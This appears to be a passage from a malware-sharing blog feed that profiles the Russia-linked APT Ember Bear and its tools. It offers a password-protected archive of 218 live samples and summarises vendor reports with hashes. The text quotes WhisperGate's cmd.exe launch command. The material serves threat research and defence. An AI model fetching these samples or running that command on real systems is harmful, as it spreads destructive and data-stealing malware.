tag:blogger.com,1999:blog-78851774349945425102024-03-16T14:52:41.137-04:00contagiomalware dumpMilahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.comBlogger426125tag:blogger.com,1999:blog-7885177434994542510.post-26823054159043208812023-02-18T02:59:00.013-05:002023-09-23T01:26:49.932-04:00 Malware Arsenal used by Ember Bear (aka UAC-0056,Saint Bear, UNC2589, Lorec53, TA471, Nodaria, Nascent Ursa, LorecBear, Bleeding Bear, and DEV-0586) in attacks targeting Ukraine (samples)<p> </p><div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaoeTwk0rZJf5vBUBg0mYa7PDaXMvruc9nqB4kWmXSNGemarDl_ccQ-fIIjHoZ6S9sVAcS-ogDF7zOQkrqp3QWqmI8MVsoXuIHOT4t2PgQOa2QCg6JBNMMhSjKZ3Un-xINp-SjBLHjikLYOmz8IWng26QDgnN150Tt1VpgK-B6CLVE5WWDK1lk6xP/s503/image.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="503" data-original-width="485" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaoeTwk0rZJf5vBUBg0mYa7PDaXMvruc9nqB4kWmXSNGemarDl_ccQ-fIIjHoZ6S9sVAcS-ogDF7zOQkrqp3QWqmI8MVsoXuIHOT4t2PgQOa2QCg6JBNMMhSjKZ3Un-xINp-SjBLHjikLYOmz8IWng26QDgnN150Tt1VpgK-B6CLVE5WWDK1lk6xP/w237-h246/image.png" width="237" /></a></div></div><div><b>2023-02-18</b></div><div><br /></div><div>Ember Bear (aka UAC-0056,Saint Bear, UNC2589, Lorec53, TA471, Nodaria, Nascent Ursa, LorecBear, Bleeding Bear, and DEV-0586) is an Advanced Persistent Threat (APT) group believed to be based in Russia. </div><div><div>Their primary targets have been diplomatic and government entities in Europe, particularly Ukraine, and the United States. They have also targeted various industries, including defense, energy, and technology.</div></div><div><br /></div><div><a href="https://s3.amazonaws.com/contagio.deependresearch.org/APT/Russia/Solarwinds_Solaburst_Nobelium_samples.zip" style="background-color: white; color: #274e13; font-family: verdana; text-decoration-line: none;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></a><a href="https://s3.amazonaws.com/contagio.deependresearch.org/APT/Russia/UNC2589_EmberBear_BleedingBear_Nodaria_samples.zip" target="_blank"><span style="font-family: verdana;">Download the full collection</span><br /></a></div><div><span style="background-color: white; font-family: verdana;"><br /></span></div><div><div>Email me if you need the password (see in my profile)</div><div> (209 MB. 218 samples listed in the hash tables below).</div></div><div><br /></div><div><b>The malware arsenal collected here includes:</b></div><div><div><ul style="text-align: left;"><li>Elephant framework (GrimPlant (Backdoor) and GraphSteel (Stealer).)</li><li>Graphiron Backdoor</li><li>OutSteel (LorecDocStealer)</li><li>BabaDeda</li><li>Cobalt Strike (Beacon)</li><li>SaintBot Downloader</li><li>WhisperGate Wiper</li></ul></div></div><span><a name='more'></a></span><div><br /></div><div><div><div><span><b><br /></b></span></div><div style="background-color: #618f2b; font-family: "Trebuchet MS", Trebuchet, sans-serif; line-height: 19px; text-align: center;"><div style="margin: 0px;"><span style="color: white;"><span style="font-family: verdana;"><b>APT Group Description</b></span></span></div></div></div><div><ul><br /></ul></div></div><div><b style="font-family: inherit;">APT Group aliases:</b></div><div><div><span style="font-family: inherit;"><b><br /></b></span></div><div><span><div>UAC-0056 (UA CERT)</div><div>Ember Bear (Crowdstrike)</div><div>Saint Bear (F-Secure)</div><div>UNC2589 (Fireeye, IBM)</div><div>Lorec53 (NSFOCUS)</div><div>TA471 (Proofpoint)</div><div>Nodaria (Symantec)</div><div>Nascent Ursa (Palo Alto)</div><div>LorecBear</div><div>Bleeding Bear (Elastic)</div><div>DEV-0586 (MIcrosoft)</div><div><br /><div>The group is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021.</div><div>The group primarily targets Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations.</div><div>The group is known for using various malicious implants such as GrimPlant, GraphSteel, and CobaltStrike Beacon, as well as spear phishing attacks with macro-embedded Excel documents.</div><div>In January 2022, the group performed a destructive wiper attack on multiple Ukrainian government computers and websites, known as WhisperGate.</div><div><br /></div><div>The Lorec53 group is a new type of APT group first identified by NSFOCUS Security Labs, and was later identified as UAC-0056 by the Ukrainian Computer Emergency Response Center.</div><div>The Lorec53 group primarily targets government workers in Ukraine and Georgia, trying to steal various types of document data or leave backdoor programs for subsequent attacks.</div><div>The group exhibits organizational characteristics similar to other known attack groups, but also demonstrates independence and the possibility of cooperating with other APT groups.</div><div>The Lorec53 group uses various social engineering techniques, temporary domain names, and unique Trojan horses, and is good at using network facilities of other hacker groups.</div><div><br /></div><div>The group's attack timeline shows alternating attacks against Georgia and Ukraine, and as time progressed, its attack activity increased significantly, and the quality of each component in the attack process became higher and higher.</div><div>The Lorec53 group has strong infiltration ability and flexible attack methods, capable of organizing large-scale and frequent phishing attacks and good at harnessing social engineering technologies and network resource management methods learned from other threat actors.</div></div><div><br /><br /></div></span></div><div style="background-color: #618f2b; font-family: "Trebuchet MS", Trebuchet, sans-serif; line-height: 19px; text-align: center;"><div style="margin: 0px;"><span style="color: white;"><span style="font-family: verdana;">Malware Arsenal</span></span></div></div></div><div><ul style="text-align: left;"><ul><br /></ul><li><b>Graphiron</b></li><ul><li>Graphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron)</li><li>The downloader contains hardcoded command-and-control (C&C) server addresses</li><li>The downloader is configured to check against a blacklist of malware analysis tools and connect to a C&C server to download the payload, which is then added to autorun</li><li>The payload is capable of stealing information from Firefox and Thunderbird, private keys from MobaXTerm, SSH known hosts, stored passwords, taking screenshots, and exfiltrating data</li><li>The password theft is carried out using a PowerShell command</li><li>The payload communicates with the C&C server using port 443 and communications are encrypted using AES cipher</li><li>Graphiron has similarities with older Nodaria (UNC2589_EmberBear_BleedingBear_Nodaria) tools such as GraphSteel and GrimPlant but can exfiltrate more data such as screenshots and SSH keys</li><li>Nodaria is a threat group active since at least March 2021, mainly targeting organizations in Ukraine and has also been linked to attacks in Kyrgyzstan and Georgia</li><li>The group uses spear-phishing emails to deliver a range of payloads to targets and their previous tools include Elephant Dropper, Elephant Downloader, SaintBot, OutSteel, GrimPlant, and GraphSteel</li><li>Nodaria's earlier tools were written in Go and Graphiron appears to be the latest piece of malware authored by the same developers, using Go version 1.18.<br /><br /></li></ul><li><b>Elephant (GrimPlant (Backdoor) and GraphSteel (Stealer))</b></li><ul><li>The Elephant Framework consists of two core components: GrimPlant (Backdoor) and GraphSteel (Stealer).</li><li>GrimPlant allows remote execution of PowerShell commands and communicates with the C&C server using gRPC and encrypted with TLS.</li><li>GraphSteel exfiltrates data from infected machines by communicating with the C&C server using WebSockets and the GraphQL query language.</li><li>GraphSteel exfiltrates information about the infected system, files from various folders and drives, and credentials from various sources including wifi passwords, browser credentials, password vault, and SSH sessions.<br /><br /></li></ul><li><b>GraphSteel Backdoor</b></li><ul><li>GrimPlant is a simple backdoor allowing for remote execution of PowerShell commands. Communication with the C2 server uses port 80 and is based on gRPC. The communications are encrypted with TLS, and its certificate is hardcoded in the binary. GraphSteel backdoor is designed to exfiltrate data from infected machines. Communication with the C&C server uses port 443 and is encrypted using the AES cipher. GraphQL query language is used for communication.</li><li>Attacks reported: GraphSteel & GrimPlant used in email phishing attacks on Ukrainian government organizations on April 26, 2022, March 28, 2022 and March 11, 2022 (Source: CERT-UA). GraphSteel and GrimPlant are both written in the Go language.</li><li>GrimPlant is a simple backdoor allowing for remote execution of PowerShell commands. Communication with the C2 server uses port 80 and is encrypted with TLS.</li><li>GraphSteel is designed to exfiltrate data from infected machines. Communication with the C&C server uses port 443 and is encrypted using AES cipher. GraphQL is used for communication.</li><li>APT responsible: UNC2589 (Ember Bear, Lorec53, UAC-0056)</li><li>Attacks reported: GraphSteel & GrimPlant were used in email phishing attacks on Ukrainian government organizations on April 26, March 28, and March 11, 2022 (Source: CERT-UA)<br /><br /></li></ul><li><b>GrimPlant Backdoor</b></li><ul><li>GrimPlant is a simple backdoor allowing for remote execution of PowerShell commands. Communication with the C2 server uses port 80 and is based on gRPC. The communications are encrypted with TLS, and its certificate is hardcoded in the binary. GraphSteel backdoor is designed to exfiltrate data from infected machines. Communication with the C&C server uses port 443 and is encrypted using the AES cipher. GraphQL query language is used for communication.</li><li>Attacks reported: GraphSteel & GrimPlant used in email phishing attacks on Ukrainian government organizations on April 26, 2022, March 28, 2022 and March 11, 2022 (Source: CERT-UA) GraphSteel and GrimPlant are both written in the Go language.</li><li>GrimPlant is a simple backdoor allowing for remote execution of PowerShell commands. Communication with the C2 server uses port 80 and is encrypted with TLS.<br /><br /></li></ul><li><b>OutSteel (LorecDocStealer)</b></li><ul><li>OutSteel malware is used in spear-phishing campaigns with malicious attachments.</li><li>The main payload is an infostealer that steals files from the victim's machine and uploads them to a Command and Control (C2) server.</li><li>The downloader used to load the infostealer is BabaDeda crypter.</li><li>The malware is believed to be state-sponsored, carried out by a hacker group called Lorec53.</li><li>The group is suspected of conducting espionage attacks against government employees in Georgia and Ukraine.</li><li>The BabaDeda crypter acts as an installer and executes shellcode stored encrypted in a file, such as xml or pdf.</li><li>The BabaDeda crypter is an evasive malware that has the purpose to load a malicious payload stored in another file.</li><li>The BabaDeda crypter is used to load a second BabaDeda crypter in the second phase of the attack.</li><li>The final payload is Outsteel, which sends the stolen files to a specified URL.</li>SaintBot Downloader<br /><br /></ul><li><b>BabaDeda</b></li><ul><li>BabaDeda Crypter is dropped by a downloader, which can be delivered via a file with the extension ".cpl"</li><li>The ".cpl" file is designed to automatically execute when double-clicked, making it easier for uneducated users to trigger the malware</li><li>BabaDeda Crypter is installed by an MSI file that is downloaded by LorecCPL downloader</li><li>The final payload is delivered as a main malicious binary named "mathparser.exe"</li><li>Capabilities of BabaDeda Crypter:</li><li>BabaDeda Crypter has the ability to install itself onto the victim's system</li><li>The malware can execute a main malicious binary, which could perform various malicious activities such as data theft, information exfiltration, or other malicious actions.<br /><br /></li></ul><li><b>SaintBot Downloader</b></li><ul><li>SaintBot malware was observed in a targeted email sent to an individual at an energy organization in Ukraine on Feb 1, 2022.</li><li>The email was a spear phishing attempt that used social engineering tactics to convince the targeted individual to open the attached malicious Word document.</li><li>The document instructed the user to double-click icons with exclamation points which, in turn, ran malicious JavaScript.</li><li>The JavaScript file ran a PowerShell one-liner that downloaded an executable from a URL and saved it to a specific location.</li><li>The URL was hosting a malicious executable that was a loader, acting as the first stage of several in the overall infection chain.</li><li>The infection chain resulted in the installation and execution of OutSteel (a document stealer), SaintBot (a loader Trojan), a batch script turned into an executable that disables Windows Defender, and a legitimate Google Chrome installation executable.</li><li>The initial loader was signed using a certificate related to the Electrum Bitcoin wallet.</li><li>The first-stage loader was a simple wrapper for later stages that decrypt DLLs and load them into memory.</li><li>The DLL is obfuscated but contains anti-analysis functionality that refuses to execute inside a virtual machine.</li><li>The DLL is another stager that will decrypt and execute four embedded binaries.</li><li>The four embedded binaries are OutSteel, SaintBot, an executable that runs a batch script to disable Windows Defender, and the Google Chrome installer<br /><br /></li></ul><li><b>Cobalt Strike (Beacon)</b></li><ul><li>Cobalt Strike is a commercial penetration testing tool that is used by threat actors as a backdoor agent named 'Beacon' on target machines. It is a versatile tool that is used by a wide range of threat actors, including APT groups and ransomware operators, for downloading and executing malicious payloads.</li><li>The Beacon implant is a file-less, stage-less or multi-stage shellcode that is loaded either by exploiting a vulnerability or executing a shellcode loader. The Beacon can communicate with the C&C server using several protocols including HTTP, HTTPS, DNS, SMB, named pipes as well as forward and reverse TCP. The Beacon can also chain connections to establish a foothold inside the compromised network and pivot internally into other systems.</li><li>Cobalt Strike has been used in multiple email phishing attacks on Ukrainian government organizations and is attributed to the UNC2589 APT group. The Beacon has also been used in combination with exploits like CVE-2021-40444 and CVE-2022-30190 (Follina)</li><li>BEACON: backdoor written in C/C++, part of the Cobalt Strike framework</li><li>Supports shell command execution, file transfer, file execution, file management</li><li>Can capture keystrokes and screenshots, act as a proxy server</li><li>Can harvest system credentials, port scan, and enumerate systems on a network</li><li>Communicates with C&C server via HTTP or DNS<br /><br /></li></ul><li><b>WhisperGate Wiper</b></li><ul><li>Uses the following Windows Command Shell command to execute the destructive malware:</li><li>cmd.exe /Q /c start c:\stage1.exe 1> \127.0.0.1\ADMIN$__[TIMESTAMP] 2>&1</li><li>Uses PowerShell commands to connect its Command and Control (C2) server and download additional payloads</li><li>Delivers PowerShell commands in Base64 encoded form</li><li>PowerShell command: Start-Sleep -s 10</li><li>Tactic: Defense Evasion & Persistence</li><li>Modifies the Master Boot Record (MBR) to evade defense</li><li>Delivers PowerShell commands in Base64 encoded form</li><li>Searches for specific file extensions in certain directories to alter their content</li><li>Downloads file corruptor payload from a Discord channel hosted by the APT group</li><li>Download link for the malicious executable is hardcoded in the stage2.exe</li><li>Overwrites the Master Boot Record (MBR) causing the infected system to not boot up after power down</li><li>Overwrites files and corrupts their integrity</li><li>Renames the files to further its impact</li><li>Misrepresents itself as ransomware</li><li>Two-stage wiper malware</li><li>Initial access stage is unknown, but suspected to be a supply chain attack</li><li>Overwrites Master Boot Records (MBR) with a fake ransom note</li><li>Corrupts files with certain extensions and in certain directories by overwriting them with 0xCC bytes</li><li>Renames the files with a random four-byte extension</li></ul></ul></div><div><span style="font-family: inherit;"><br /></span></div>
<div style="background-color: #618f2b; font-family: "Trebuchet MS", Trebuchet, sans-serif; line-height: 19px; text-align: center;">
<div style="margin: 0px;">
<span style="color: white;"><span style="font-family: verdana;">References</span></span></div>
</div>
<span style="background-color: white; font-family: verdana;"></span>
<div>
<span style="font-family: inherit;"><br /></span>
</div>
<div><b>2023-02-08</b><span> <a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer">Symantec: </a></span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer ">Graphiron: New Russian Information Stealing Malware Deployed Against Ukraine<span style="font-family: inherit;"> </span></a></div><div><span>PDF: </span><a href="http://contagio.deependresearch.org/read/Nodaria_2023_Graphiron__New_Russian_Information_Stealing_Malware_Deployed_Against_Ukraine.pdf">http://contagio.deependresearch.org/read/Nodaria_2023_Graphiron__New_Russian_Information_Stealing_Malware_Deployed_Against_Ukraine.pdf</a></div>
<div><br /></div>
<blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div><span style="font-family: inherit;"><b>Summary:</b><br /></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div><span style="font-family: inherit;">Nodaria (UAC-0056) is targeting Ukraine with new information-stealing
malware. Infostealer.Graphiron malware steals system
information, credentials, screenshots, and files from compromised
computers.</span></div><div><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;">
Graphiron is a two-stage threat consisting of a downloader
(Downloader.Graphiron) and a payload (Infostealer.Graphiron).
</div><div style="text-align: left;"><br /></div><div style="text-align: left;">
The downloader hardcodes C&C server addresses. It checks a malware
analysis tool blacklist when performed.
</div><div style="text-align: left;"><br /></div><div style="text-align: left;">
If no blacklisted processes are found, it will download, decrypt, and autorun
the payload from a C&C server. Graphiron uses AES with hardcoded
keys. It generates.lock and.trash files. MicrosoftOfficeDashboard.exe and
OfficeTemplate.exe are hardcoded file names.
</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><div>
GraphSteel and GrimPlant are comparable to Graphiron. Using PowerShell,
GraphSteel exfiltrates files, system information, and password vault
credentials. Graphiron can also exfiltrate screenshots and SSH keys.</div></div></blockquote>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div style="text-align: left;"><br /></div><div><div><b><br /></b></div><div><b>2022-08-18<span style="white-space: pre;"> </span><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/" target="_blank">Trustwave - Overview of the Cyber Weapons Used in the Ukraine - Russia War</a> </b></div><div>PDF: <a href="http://contagio.deependresearch.org/read/APT_RU_2022_Overview_of_the_Cyber_Weapons_Used_in_the_Ukraine_-_Russia_War.pdf">http://contagio.deependresearch.org/read/APT_RU_2022_Overview_of_the_Cyber_Weapons_Used_in_the_Ukraine_-_Russia_War.pdf</a></div><div><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div><div style="text-align: left;"><b>Summary:</b></div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div style="text-align: left;"><div style="text-align: left;"><div>HermeticWiper:</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>APT responsible: Sandworm (Black Energy, UAC-0082)</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Attacks reported: Massive cyberattacks against Ukrainian organizations on February 23, 2022</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Disables the Volume Shadow Copy Service (VSS)</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Abuses legitimate drivers to corrupt data and render recovery impossible</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Targets Windows registry files ntuser.dat and Windows event logs</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Triggers system restart rendering the targeted host inoperable</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>SHA256: 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>HermeticRansom:</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div><br /></div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>APT responsible: Sandworm (Black Energy, UAC-0082)</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Attacks reported: Cyberattacks against Ukrainian organizations on February 23, 2022</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Written in Go language</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Enumerates available drives and renames selected files</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Encrypts file contents using AES algorithm</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Creates a read_me.html file with a ransom note</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>SHA256: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>IsaacWiper:</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div><br /></div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>APT responsible: Gamaredon (Primitive Bear, Armageddon)</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Attacks reported: Cyberattacks against Ukrainian government organizations on February 24, 2022</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Overwrites existing content with random bytes</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Renames files it can't access and attempts to wipe newly renamed files</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Creates a log file with corrupting activity progress</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>SHA256: 13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>AcidRain:</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div><br /></div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>APT responsible: Unknown</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Attacks reported: Cyberattacks against Viasat’s KA-SAT network and Enercon wind turbines on February 24, 2022</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Overwrites files and symbolic links with random data from the memory buffer</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Avoids certain directories if executed with root permissions</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Triggers a device reboot after wiping</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>SHA256: 9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>LoadEdge (InvisiMole):</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div><br /></div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>APT responsible: InvisiMole (UAC-0035)</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Attacks reported: Email phishing attacks on Ukrainian government organizations on March 18, 2022</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Supports functionalities such as file execution, upload, download, deletion, and obtaining system information</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Communication with C&C uses HTTP and JSON formatted data</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Persistence provided by HTA file creating an entry under the Run registry key</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Resembles an upgraded version of InvisiMole's TCP downloader component</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>SHA256: fd72080eca622fa3d9573b43c86a770f7467f3354225118ab2634383bd7b42eb</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>GraphSteel & GrimPlant:</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div><br /></div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>APT responsible: UNC2589 Ember Bear, Lorec53, UAC-0056</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Attacks reported: Email phishing attacks on Ukrainian government organizations on March 11, March 28, and April 26, 2022</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>Both written in Go language</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>GrimPlant is a simple backdoor allowing for remote execution of PowerShell commands</div></div></div><div style="text-align: left;"><div style="text-align: left;"><div>GraphSteel exfiltrates data and steals credentials using</div></div></div></blockquote><div style="text-align: left;"><div><br /></div></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><br /></div><div style="text-align: left;"><b>2022-07-20<span style="white-space: pre;"> </span><a href="https://www.mandiant.com/resources/blog/spear-phish-ukrainian-entities " target="_blank">Mandiant - Evacuation and Humanitarian Documents used to Spear Phish Ukrainian Entities</a><span style="white-space: pre;"> </span></b></div><div style="text-align: left;">PDF:<span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/2022_Evacuation_and_Humanitarian_Documents_used_to_Spear_Phish_Ukrainian_Entities_Mandiant.pdf">http://contagio.deependresearch.org/read/2022_Evacuation_and_Humanitarian_Documents_used_to_Spear_Phish_Ukrainian_Entities_Mandiant.pdf</a></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><b>Summary:</b></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><br />UNC1151 is a group that is believed to be sponsored by Belarus and has frequently used the access and information gained by their intrusions to support information operations tracked as “Ghostwriter.”<br />UNC2589 is believed to act in support of Russian government interest and has been conducting extensive espionage collection in Ukraine.<br />UNC2589 uses spear phishing campaigns with various themes, including COVID-19 and the war in Ukraine, and has used a variety of different infrastructure.<br />Mandiant has attributed the January 14 destructive attack on Ukraine using PAYWIPE (WHISPERGATE) to UNC2589.<br />GRIMPLANT is a backdoor used by UNC2589 and GRAPHSTEEL is an infostealer.<br />Mandiant analyzed a malicious document with an evacuation plan-themed lure, which was likely used by UNC2589 to target Ukrainian entities in a phishing campaign in late February 2022.<br />The malware was delivered via phishing email and the Remote Utilities utility was installed upon execution.<br />Remote Utilities allows attackers to set persistence through creating a startup service.<br />Mandiant Intelligence discovered another likely UNC2589-related phishing campaign targeting Ukrainian entities with GRIMPLANT and GRAPHSTEEL malware on March 27, 2022.<div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;">The malware was delivered via phishing email and was dropped onto the victim machine through a macro in an XLS document.</div></div></div></blockquote><p><br /> </p><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>2022-07-20<span style="white-space: pre;"> </span><a href="https://www.microsoft.com/en-us/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ ">Microsoft - Destructive malware targeting Ukrainian organizations<span style="white-space: pre;"> </span></a></b></div><div style="text-align: left;">PDF: <span style="white-space: pre;"> </span><a href="http://contagio.deependresearch.org/read/DEV-0586_2022_Destructive+malware+targeting+Ukrainian+organizations+-+Microsoft+Security+Blog.pdf">http://contagio.deependresearch.org/read/DEV-0586_2022_Destructive+malware+targeting+Ukrainian+organizations+-+Microsoft+Security+Blog.pdf</a></div></div></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div><b>Summary: </b></div></div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div>The malware appears to be designed to render targeted devices inoperable rather than to obtain a ransom, unlike typical ransomware attacks.</div><div>The malware has been identified on dozens of systems in Ukraine, including multiple government, non-profit, and information technology organizations.</div><div>MSTIC assesses that this activity represents an elevated risk to any organization located or with systems in Ukraine.</div><div>The malware operates in two stages: Stage 1 overwrites the Master Boot Record (MBR) with a ransom note, and Stage 2 is a file corrupter that overwrites files with a fixed number of 0xCC bytes.</div><div>Microsoft has implemented detections for this malware family as WhisperGate and is continuing its investigation.</div><div>MSTIC recommends organizations to investigate the provided indicators of compromise (IOCs), enable multifactor authentication, and enable Controlled Folder Access in Microsoft Defender for Endpoint to prevent MBR/VBR modification.</div><div>The detections in place across Microsoft security products include DoS:Win32/WhisperGate.A!dha, DoS:Win32/WhisperGate.C!.dha, DoS:Win32/WhisperGate.H!dha, and DoS:Win32/WhisperGate.X!dha.</div></div></div></div></blockquote><p> </p><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><b>2022-03-01<span style="white-space: pre;"> </span><a href="https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/" target="_blank">ESET - IsaacWiper and HermeticWizard: New wiper and worm targeting Ukraine</a></b></div><div style="text-align: left;">PDF:<span style="white-space: pre;"> </span><a href="https://contagio.deependresearch.org/read/EmberBear_2022_IsaacWiper_and_HermeticWizard__New_wiper_and_worm_targeting_Ukraine__ESET.pdf">https://contagio.deependresearch.org/read/EmberBear_2022_IsaacWiper_and_HermeticWizard__New_wiper_and_worm_targeting_Ukraine__ESET.pdf</a></div><div style="text-align: left;"><br /></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div><b>Summary:</b></div></div></div></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><div>HermeticWiper: Malware that makes a system inoperable by corrupting its data. It disables the Volume Shadow Copy Service, wipes the MBR, MFT, and NTUSER files, and overwrites various folders with random bytes generated by CryptGenRandom.</div><div>HermeticWizard: Worm that spreads HermeticWiper across a local network via WMI and SMB. It is a DLL file that exports functions DllInstall, DllRegisterServer, and DllUnregisterServer. It gathers IP addresses on a network, and when it finds a reachable machine, drops HermeticWiper and executes it.</div><div>HermeticRansom: Ransomware written in Go that encrypts files and displays a ransom message to the victim.</div><div>Threat actors TTPs:</div><div><br /></div><div>Initial access: Unknown for both HermeticWiper and IsaacWiper, although it is suspected that the attackers may have used tools such as Impacket to move laterally. HermeticWiper was deployed in at least one instance through the default domain policy (GPO), suggesting the attackers had prior access to the victim's Active Directory server.</div><div>Lateral movement: HermeticWizard worm was used to spread HermeticWiper across the compromised networks via SMB and WMI.</div><div>Persistence: HermeticWiper and HermeticWizard are signed by a code-signing certificate assigned to Hermetica Digital Ltd issued on April 13th, 2021, which was not stolen, but instead likely obtained by attackers impersonating the Cypriot company to get this certificate from DigiCert.</div><div>Malware delivery: HermeticWiper and HermeticWizard were deployed through various methods, including GPO and the use of Impacket tools. HermeticRansom was deployed through GPO in at least one instance.</div><div>Attribution: ESET researchers have not yet found any tangible connection with a known threat actor. The malware families do not share any significant code similarity with other samples in the ESET malware collection.</div></div></div></div></blockquote><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><div style="text-align: left;"><br /></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><b>2022-02-25<span style="white-space: pre;"> </span><a href="https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/" target="_blank">PaloAlto - Spear Phishing Attacks TargetOrganizations in Ukraine, PayloadsInclude the Document Stealer OutSteeland the Downloader SaintBot</a><span style="white-space: pre;"> </span><span style="white-space: pre;"> </span></b></div><div style="text-align: left;">PDF:<span style="white-space: pre;"> </span><a 